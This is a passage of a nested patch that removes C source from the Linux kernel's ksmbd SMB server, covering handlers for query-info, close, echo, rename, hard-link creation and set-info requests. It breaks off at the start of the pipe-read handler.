+-	inc_rfc1001_len(work->response_buf, secdesclen);
+-	return 0;
+-}
+-
+-/**
+- * smb2_query_info() - handler for smb2 query info command
+- * @work:	smb work containing query info request buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_query_info(struct ksmbd_work *work)
+-{
+-	struct smb2_query_info_req *req;
+-	struct smb2_query_info_rsp *rsp;
+-	int rc = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	ksmbd_debug(SMB, "GOT query info request\n");
+-
+-	switch (req->InfoType) {
+-	case SMB2_O_INFO_FILE:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+-		rc = smb2_get_info_file(work, req, rsp);
+-		break;
+-	case SMB2_O_INFO_FILESYSTEM:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILESYSTEM\n");
+-		rc = smb2_get_info_filesystem(work, req, rsp);
+-		break;
+-	case SMB2_O_INFO_SECURITY:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
+-		rc = smb2_get_info_sec(work, req, rsp);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "InfoType %d not supported yet\n",
+-			    req->InfoType);
+-		rc = -EOPNOTSUPP;
+-	}
+-
+-	if (rc < 0) {
+-		if (rc == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (rc == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else if (rc == -EIO)
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
+-			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-		smb2_set_err_rsp(work);
+-
+-		ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n",
+-			    rc);
+-		return rc;
+-	}
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->OutputBufferOffset = cpu_to_le16(72);
+-	inc_rfc1001_len(work->response_buf, 8);
+-	return 0;
+-}
+-
+-/**
+- * smb2_close_pipe() - handler for closing IPC pipe
+- * @work:	smb work containing close request buffer
+- *
+- * Return:	0
+- */
+-static noinline int smb2_close_pipe(struct ksmbd_work *work)
+-{
+-	u64 id;
+-	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	id = req->VolatileFileId;
+-	ksmbd_session_rpc_close(work->sess, id);
+-
+-	rsp->StructureSize = cpu_to_le16(60);
+-	rsp->Flags = 0;
+-	rsp->Reserved = 0;
+-	rsp->CreationTime = 0;
+-	rsp->LastAccessTime = 0;
+-	rsp->LastWriteTime = 0;
+-	rsp->ChangeTime = 0;
+-	rsp->AllocationSize = 0;
+-	rsp->EndOfFile = 0;
+-	rsp->Attributes = 0;
+-	inc_rfc1001_len(work->response_buf, 60);
+-	return 0;
+-}
+-
+-/**
+- * smb2_close() - handler for smb2 close file command
+- * @work:	smb work containing close request buffer
+- *
+- * Return:	0
+- */
+-int smb2_close(struct ksmbd_work *work)
+-{
+-	u64 volatile_id = KSMBD_NO_FID;
+-	u64 sess_id;
+-	struct smb2_close_req *req;
+-	struct smb2_close_rsp *rsp;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_file *fp;
+-	struct inode *inode;
+-	u64 time;
+-	int err = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe close request\n");
+-		return smb2_close_pipe(work);
+-	}
+-
+-	sess_id = le64_to_cpu(req->hdr.SessionId);
+-	if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
+-		sess_id = work->compound_sid;
+-
+-	work->compound_sid = 0;
+-	if (check_session_id(conn, sess_id)) {
+-		work->compound_sid = sess_id;
+-	} else {
+-		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
+-		if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		err = -EBADF;
+-		goto out;
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off &&
+-	    !has_file_id(req->VolatileFileId)) {
+-		if (!has_file_id(work->compound_fid)) {
+-			/* file already closed, return FILE_CLOSED */
+-			ksmbd_debug(SMB, "file already closed\n");
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-			err = -EBADF;
+-			goto out;
+-		} else {
+-			ksmbd_debug(SMB,
+-				    "Compound request set FID = %llu:%llu\n",
+-				    work->compound_fid,
+-				    work->compound_pfid);
+-			volatile_id = work->compound_fid;
+-
+-			/* file closed, stored id is not valid anymore */
+-			work->compound_fid = KSMBD_NO_FID;
+-			work->compound_pfid = KSMBD_NO_FID;
+-		}
+-	} else {
+-		volatile_id = req->VolatileFileId;
+-	}
+-	ksmbd_debug(SMB, "volatile_id = %llu\n", volatile_id);
+-
+-	rsp->StructureSize = cpu_to_le16(60);
+-	rsp->Reserved = 0;
+-
+-	if (req->Flags == SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB) {
+-		fp = ksmbd_lookup_fd_fast(work, volatile_id);
+-		if (!fp) {
+-			err = -ENOENT;
+-			goto out;
+-		}
+-
+-		inode = file_inode(fp->filp);
+-		rsp->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
+-		rsp->AllocationSize = S_ISDIR(inode->i_mode) ? 0 :
+-			cpu_to_le64(inode->i_blocks << 9);
+-		rsp->EndOfFile = cpu_to_le64(inode->i_size);
+-		rsp->Attributes = fp->f_ci->m_fattr;
+-		rsp->CreationTime = cpu_to_le64(fp->create_time);
+-		time = ksmbd_UnixTimeToNT(inode->i_atime);
+-		rsp->LastAccessTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(inode->i_mtime);
+-		rsp->LastWriteTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(inode->i_ctime);
+-		rsp->ChangeTime = cpu_to_le64(time);
+-		ksmbd_fd_put(work, fp);
+-	} else {
+-		rsp->Flags = 0;
+-		rsp->AllocationSize = 0;
+-		rsp->EndOfFile = 0;
+-		rsp->Attributes = 0;
+-		rsp->CreationTime = 0;
+-		rsp->LastAccessTime = 0;
+-		rsp->LastWriteTime = 0;
+-		rsp->ChangeTime = 0;
+-	}
+-
+-	err = ksmbd_close_fd(work, volatile_id);
+-out:
+-	if (err) {
+-		if (rsp->hdr.Status == 0)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		smb2_set_err_rsp(work);
+-	} else {
+-		inc_rfc1001_len(work->response_buf, 60);
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_echo() - handler for smb2 echo(ping) command
+- * @work:	smb work containing echo request buffer
+- *
+- * Return:	0
+- */
+-int smb2_echo(struct ksmbd_work *work)
+-{
+-	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
+-}
+-
+-static int smb2_rename(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp,
+-		       struct user_namespace *user_ns,
+-		       struct smb2_file_rename_info *file_info,
+-		       struct nls_table *local_nls)
+-{
+-	struct ksmbd_share_config *share = fp->tcon->share_conf;
+-	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
+-	char *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
+-
+-	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
+-	if (IS_ERR(abs_oldname)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	old_name = strrchr(abs_oldname, '/');
+-	if (old_name && old_name[1] != '\0') {
+-		old_name++;
+-	} else {
+-		ksmbd_debug(SMB, "can't get last component in path %s\n",
+-			    abs_oldname);
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+-	new_name = smb2_get_name(file_info->FileName,
+-				 le32_to_cpu(file_info->FileNameLength),
+-				 local_nls);
+-	if (IS_ERR(new_name)) {
+-		rc = PTR_ERR(new_name);
+-		goto out;
+-	}
+-
+-	if (strchr(new_name, ':')) {
+-		int s_type;
+-		char *xattr_stream_name, *stream_name = NULL;
+-		size_t xattr_stream_size;
+-		int len;
+-
+-		rc = parse_stream_name(new_name, &stream_name, &s_type);
+-		if (rc < 0)
+-			goto out;
+-
+-		len = strlen(new_name);
+-		if (len > 0 && new_name[len - 1] != '/') {
+-			pr_err("not allow base filename in rename\n");
+-			rc = -ESHARE;
+-			goto out;
+-		}
+-
+-		rc = ksmbd_vfs_xattr_stream_name(stream_name,
+-						 &xattr_stream_name,
+-						 &xattr_stream_size,
+-						 s_type);
+-		if (rc)
+-			goto out;
+-
+-		rc = ksmbd_vfs_setxattr(user_ns,
+-					fp->filp->f_path.dentry,
+-					xattr_stream_name,
+-					NULL, 0, 0);
+-		if (rc < 0) {
+-			pr_err("failed to store stream name in xattr: %d\n",
+-			       rc);
+-			rc = -EINVAL;
+-			goto out;
+-		}
+-
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "new name %s\n", new_name);
+-	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+-	if (ksmbd_share_veto_filename(share, new_name)) {
+-		rc = -ENOENT;
+-		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
+-		goto out;
+-	}
+-
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, new_name);
+-			if (rc) {
+-				if (rc != -ENOTEMPTY)
+-					rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
+-					    new_name, rc);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present &&
+-		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB,
+-				    "cannot rename already existing file\n");
+-			goto out;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
+-out:
+-	kfree(pathname);
+-	if (!IS_ERR(new_name))
+-		kfree(new_name);
+-	return rc;
+-}
+-
+-static int smb2_create_link(struct ksmbd_work *work,
+-			    struct ksmbd_share_config *share,
+-			    struct smb2_file_link_info *file_info,
+-			    unsigned int buf_len, struct file *filp,
+-			    struct nls_table *local_nls)
+-{
+-	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
+-
+-	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
+-			le32_to_cpu(file_info->FileNameLength))
+-		return -EINVAL;
+-
+-	ksmbd_debug(SMB, "setting FILE_LINK_INFORMATION\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	link_name = smb2_get_name(file_info->FileName,
+-				  le32_to_cpu(file_info->FileNameLength),
+-				  local_nls);
+-	if (IS_ERR(link_name) || S_ISDIR(file_inode(filp)->i_mode)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "link name is %s\n", link_name);
+-	target_name = file_path(filp, pathname, PATH_MAX);
+-	if (IS_ERR(target_name)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "target name is %s\n", target_name);
+-	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, link_name);
+-			if (rc) {
+-				rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s\n",
+-					    link_name);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB, "link already exists\n");
+-			goto out;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_link(work, target_name, link_name);
+-	if (rc)
+-		rc = -EINVAL;
+-out:
+-	if (!IS_ERR(link_name))
+-		kfree(link_name);
+-	kfree(pathname);
+-	return rc;
+-}
+-
+-static int set_file_basic_info(struct ksmbd_file *fp,
+-			       struct smb2_file_basic_info *file_info,
+-			       struct ksmbd_share_config *share)
+-{
+-	struct iattr attrs;
+-	struct file *filp;
+-	struct inode *inode;
+-	struct user_namespace *user_ns;
+-	int rc = 0;
+-
+-	if (!(fp->daccess & FILE_WRITE_ATTRIBUTES_LE))
+-		return -EACCES;
+-
+-	attrs.ia_valid = 0;
+-	filp = fp->filp;
+-	inode = file_inode(filp);
+-	user_ns = file_mnt_user_ns(filp);
+-
+-	if (file_info->CreationTime)
+-		fp->create_time = le64_to_cpu(file_info->CreationTime);
+-
+-	if (file_info->LastAccessTime) {
+-		attrs.ia_atime = ksmbd_NTtimeToUnix(file_info->LastAccessTime);
+-		attrs.ia_valid |= (ATTR_ATIME | ATTR_ATIME_SET);
+-	}
+-
+-	attrs.ia_valid |= ATTR_CTIME;
+-	if (file_info->ChangeTime)
+-		attrs.ia_ctime = ksmbd_NTtimeToUnix(file_info->ChangeTime);
+-	else
+-		attrs.ia_ctime = inode->i_ctime;
+-
+-	if (file_info->LastWriteTime) {
+-		attrs.ia_mtime = ksmbd_NTtimeToUnix(file_info->LastWriteTime);
+-		attrs.ia_valid |= (ATTR_MTIME | ATTR_MTIME_SET);
+-	}
+-
+-	if (file_info->Attributes) {
+-		if (!S_ISDIR(inode->i_mode) &&
+-		    file_info->Attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
+-			pr_err("can't change a file to a directory\n");
+-			return -EINVAL;
+-		}
+-
+-		if (!(S_ISDIR(inode->i_mode) && file_info->Attributes == FILE_ATTRIBUTE_NORMAL_LE))
+-			fp->f_ci->m_fattr = file_info->Attributes |
+-				(fp->f_ci->m_fattr & FILE_ATTRIBUTE_DIRECTORY_LE);
+-	}
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_STORE_DOS_ATTRS) &&
+-	    (file_info->CreationTime || file_info->Attributes)) {
+-		struct xattr_dos_attrib da = {0};
+-
+-		da.version = 4;
+-		da.itime = fp->itime;
+-		da.create_time = fp->create_time;
+-		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+-			XATTR_DOSINFO_ITIME;
+-
+-		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						    filp->f_path.dentry, &da);
+-		if (rc)
+-			ksmbd_debug(SMB,
+-				    "failed to restore file attribute in EA\n");
+-		rc = 0;
+-	}
+-
+-	if (attrs.ia_valid) {
+-		struct dentry *dentry = filp->f_path.dentry;
+-		struct inode *inode = d_inode(dentry);
+-
+-		if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
+-			return -EACCES;
+-
+-		inode_lock(inode);
+-		inode->i_ctime = attrs.ia_ctime;
+-		attrs.ia_valid &= ~ATTR_CTIME;
+-		rc = notify_change(user_ns, dentry, &attrs, NULL);
+-		inode_unlock(inode);
+-	}
+-	return rc;
+-}
+-
+-static int set_file_allocation_info(struct ksmbd_work *work,
+-				    struct ksmbd_file *fp,
+-				    struct smb2_file_alloc_info *file_alloc_info)
+-{
+-	/*
+-	 * TODO : It's working fine only when store dos attributes
+-	 * is not yes. need to implement a logic which works
+-	 * properly with any smb.conf option
+-	 */
+-
+-	loff_t alloc_blks;
+-	struct inode *inode;
+-	int rc;
+-
+-	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+-		return -EACCES;
+-
+-	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
+-	inode = file_inode(fp->filp);
+-
+-	if (alloc_blks > inode->i_blocks) {
+-		smb_break_all_levII_oplock(work, fp, 1);
+-		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+-				   alloc_blks * 512);
+-		if (rc && rc != -EOPNOTSUPP) {
+-			pr_err("vfs_fallocate is failed : %d\n", rc);
+-			return rc;
+-		}
+-	} else if (alloc_blks < inode->i_blocks) {
+-		loff_t size;
+-
+-		/*
+-		 * Allocation size could be smaller than original one
+-		 * which means allocated blocks in file should be
+-		 * deallocated. use truncate to cut out it, but inode
+-		 * size is also updated with truncate offset.
+-		 * inode size is retained by backup inode size.
+-		 */
+-		size = i_size_read(inode);
+-		rc = ksmbd_vfs_truncate(work, fp, alloc_blks * 512);
+-		if (rc) {
+-			pr_err("truncate failed!, err %d\n", rc);
+-			return rc;
+-		}
+-		if (size < alloc_blks * 512)
+-			i_size_write(inode, size);
+-	}
+-	return 0;
+-}
+-
+-static int set_end_of_file_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+-				struct smb2_file_eof_info *file_eof_info)
+-{
+-	loff_t newsize;
+-	struct inode *inode;
+-	int rc;
+-
+-	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+-		return -EACCES;
+-
+-	newsize = le64_to_cpu(file_eof_info->EndOfFile);
+-	inode = file_inode(fp->filp);
+-
+-	/*
+-	 * If FILE_END_OF_FILE_INFORMATION of set_info_file is called
+-	 * on FAT32 shared device, truncate execution time is too long
+-	 * and network error could cause from windows client. because
+-	 * truncate of some filesystem like FAT32 fill zero data in
+-	 * truncated range.
+-	 */
+-	if (inode->i_sb->s_magic != MSDOS_SUPER_MAGIC) {
+-		ksmbd_debug(SMB, "truncated to newsize %lld\n", newsize);
+-		rc = ksmbd_vfs_truncate(work, fp, newsize);
+-		if (rc) {
+-			ksmbd_debug(SMB, "truncate failed!, err %d\n", rc);
+-			if (rc != -EAGAIN)
+-				rc = -EBADF;
+-			return rc;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			   struct smb2_file_rename_info *rename_info,
+-			   unsigned int buf_len)
+-{
+-	struct user_namespace *user_ns;
+-	struct ksmbd_file *parent_fp;
+-	struct dentry *parent;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int ret;
+-
+-	if (!(fp->daccess & FILE_DELETE_LE)) {
+-		pr_err("no right to delete : 0x%x\n", fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	if (buf_len < (u64)sizeof(struct smb2_file_rename_info) +
+-			le32_to_cpu(rename_info->FileNameLength))
+-		return -EINVAL;
+-
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	if (ksmbd_stream_fd(fp))
+-		goto next;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-
+-	if (parent_fp) {
+-		if (parent_fp->daccess & FILE_DELETE_LE) {
+-			pr_err("parent dir is opened with delete access\n");
+-			ksmbd_fd_put(work, parent_fp);
+-			return -ESHARE;
+-		}
+-		ksmbd_fd_put(work, parent_fp);
+-	}
+-next:
+-	return smb2_rename(work, fp, user_ns, rename_info,
+-			   work->conn->local_nls);
+-}
+-
+-static int set_file_disposition_info(struct ksmbd_file *fp,
+-				     struct smb2_file_disposition_info *file_info)
+-{
+-	struct inode *inode;
+-
+-	if (!(fp->daccess & FILE_DELETE_LE)) {
+-		pr_err("no right to delete : 0x%x\n", fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	inode = file_inode(fp->filp);
+-	if (file_info->DeletePending) {
+-		if (S_ISDIR(inode->i_mode) &&
+-		    ksmbd_vfs_empty_dir(fp) == -ENOTEMPTY)
+-			return -EBUSY;
+-		ksmbd_set_inode_pending_delete(fp);
+-	} else {
+-		ksmbd_clear_inode_pending_delete(fp);
+-	}
+-	return 0;
+-}
+-
+-static int set_file_position_info(struct ksmbd_file *fp,
+-				  struct smb2_file_pos_info *file_info)
+-{
+-	loff_t current_byte_offset;
+-	unsigned long sector_size;
+-	struct inode *inode;
+-
+-	inode = file_inode(fp->filp);
+-	current_byte_offset = le64_to_cpu(file_info->CurrentByteOffset);
+-	sector_size = inode->i_sb->s_blocksize;
+-
+-	if (current_byte_offset < 0 ||
+-	    (fp->coption == FILE_NO_INTERMEDIATE_BUFFERING_LE &&
+-	     current_byte_offset & (sector_size - 1))) {
+-		pr_err("CurrentByteOffset is not valid : %llu\n",
+-		       current_byte_offset);
+-		return -EINVAL;
+-	}
+-
+-	fp->filp->f_pos = current_byte_offset;
+-	return 0;
+-}
+-
+-static int set_file_mode_info(struct ksmbd_file *fp,
+-			      struct smb2_file_mode_info *file_info)
+-{
+-	__le32 mode;
+-
+-	mode = file_info->Mode;
+-
+-	if ((mode & ~FILE_MODE_INFO_MASK)) {
+-		pr_err("Mode is not valid : 0x%x\n", le32_to_cpu(mode));
+-		return -EINVAL;
+-	}
+-
+-	/*
+-	 * TODO : need to implement consideration for
+-	 * FILE_SYNCHRONOUS_IO_ALERT and FILE_SYNCHRONOUS_IO_NONALERT
+-	 */
+-	ksmbd_vfs_set_fadvise(fp->filp, mode);
+-	fp->coption = mode;
+-	return 0;
+-}
+-
+-/**
+- * smb2_set_info_file() - handler for smb2 set info command
+- * @work:	smb work containing set info command buffer
+- * @fp:		ksmbd_file pointer
+- * @req:	request buffer pointer
+- * @share:	ksmbd_share_config pointer
+- *
+- * Return:	0 on success, otherwise error
+- * TODO: need to implement an error handling for STATUS_INFO_LENGTH_MISMATCH
+- */
+-static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			      struct smb2_set_info_req *req,
+-			      struct ksmbd_share_config *share)
+-{
+-	unsigned int buf_len = le32_to_cpu(req->BufferLength);
+-
+-	switch (req->FileInfoClass) {
+-	case FILE_BASIC_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_basic_info))
+-			return -EINVAL;
+-
+-		return set_file_basic_info(fp, (struct smb2_file_basic_info *)req->Buffer, share);
+-	}
+-	case FILE_ALLOCATION_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_alloc_info))
+-			return -EINVAL;
+-
+-		return set_file_allocation_info(work, fp,
+-						(struct smb2_file_alloc_info *)req->Buffer);
+-	}
+-	case FILE_END_OF_FILE_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_eof_info))
+-			return -EINVAL;
+-
+-		return set_end_of_file_info(work, fp,
+-					    (struct smb2_file_eof_info *)req->Buffer);
+-	}
+-	case FILE_RENAME_INFORMATION:
+-	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_file_rename_info))
+-			return -EINVAL;
+-
+-		return set_rename_info(work, fp,
+-				       (struct smb2_file_rename_info *)req->Buffer,
+-				       buf_len);
+-	}
+-	case FILE_LINK_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_link_info))
+-			return -EINVAL;
+-
+-		return smb2_create_link(work, work->tcon->share_conf,
+-					(struct smb2_file_link_info *)req->Buffer,
+-					buf_len, fp->filp,
+-					work->conn->local_nls);
+-	}
+-	case FILE_DISPOSITION_INFORMATION:
+-	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_file_disposition_info))
+-			return -EINVAL;
+-
+-		return set_file_disposition_info(fp,
+-						 (struct smb2_file_disposition_info *)req->Buffer);
+-	}
+-	case FILE_FULL_EA_INFORMATION:
+-	{
+-		if (!(fp->daccess & FILE_WRITE_EA_LE)) {
+-			pr_err("Not permitted to write ext  attr: 0x%x\n",
+-			       fp->daccess);
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_ea_info))
+-			return -EINVAL;
+-
+-		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
+-				   buf_len, &fp->filp->f_path);
+-	}
+-	case FILE_POSITION_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_pos_info))
+-			return -EINVAL;
+-
+-		return set_file_position_info(fp, (struct smb2_file_pos_info *)req->Buffer);
+-	}
+-	case FILE_MODE_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_mode_info))
+-			return -EINVAL;
+-
+-		return set_file_mode_info(fp, (struct smb2_file_mode_info *)req->Buffer);
+-	}
+-	}
+-
+-	pr_err("Unimplemented Fileinfoclass :%d\n", req->FileInfoClass);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
+-			     char *buffer, int buf_len)
+-{
+-	struct smb_ntsd *pntsd = (struct smb_ntsd *)buffer;
+-
+-	fp->saccess |= FILE_SHARE_DELETE_LE;
+-
+-	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
+-			buf_len, false);
+-}
+-
+-/**
+- * smb2_set_info() - handler for smb2 set info command handler
+- * @work:	smb work containing set info request buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_set_info(struct ksmbd_work *work)
+-{
+-	struct smb2_set_info_req *req;
+-	struct smb2_set_info_rsp *rsp;
+-	struct ksmbd_file *fp;
+-	int rc = 0;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-
+-	ksmbd_debug(SMB, "Received set info request\n");
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		req = ksmbd_req_buf_next(work);
+-		rsp = ksmbd_resp_buf_next(work);
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	} else {
+-		req = smb2_get_msg(work->request_buf);
+-		rsp = smb2_get_msg(work->response_buf);
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp) {
+-		ksmbd_debug(SMB, "Invalid id for close: %u\n", id);
+-		rc = -ENOENT;
+-		goto err_out;
+-	}
+-
+-	switch (req->InfoType) {
+-	case SMB2_O_INFO_FILE:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+-		rc = smb2_set_info_file(work, fp, req, work->tcon->share_conf);
+-		break;
+-	case SMB2_O_INFO_SECURITY:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
+-		if (ksmbd_override_fsids(work)) {
+-			rc = -ENOMEM;
+-			goto err_out;
+-		}
+-		rc = smb2_set_info_sec(fp,
+-				       le32_to_cpu(req->AdditionalInformation),
+-				       req->Buffer,
+-				       le32_to_cpu(req->BufferLength));
+-		ksmbd_revert_fsids(work);
+-		break;
+-	default:
+-		rc = -EOPNOTSUPP;
+-	}
+-
+-	if (rc < 0)
+-		goto err_out;
+-
+-	rsp->StructureSize = cpu_to_le16(2);
+-	inc_rfc1001_len(work->response_buf, 2);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-err_out:
+-	if (rc == -EACCES || rc == -EPERM || rc == -EXDEV)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -ESHARE)
+-		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
+-	else if (rc == -EBUSY || rc == -ENOTEMPTY)
+-		rsp->hdr.Status = STATUS_DIRECTORY_NOT_EMPTY;
+-	else if (rc == -EAGAIN)
+-		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-	else if (rc == -EBADF || rc == -ESTALE)
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-	else if (rc == -EEXIST)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
+-	else if (rsp->hdr.Status == 0 || rc == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n", rc);
+-	return rc;
+-}
+-
+-/**
+- * smb2_read_pipe() - handler for smb2 read from IPC pipe
+- * @work:	smb work containing read IPC pipe command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static noinline int smb2_read_pipe(struct ksmbd_work *work)
+-{
+-	int nbytes = 0, err;
+-	u64 id;
+-	struct ksmbd_rpc_command *rpc_resp;
+-	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	id = req->VolatileFileId;
+-
+-	inc_rfc1001_len(work->response_buf, 16);
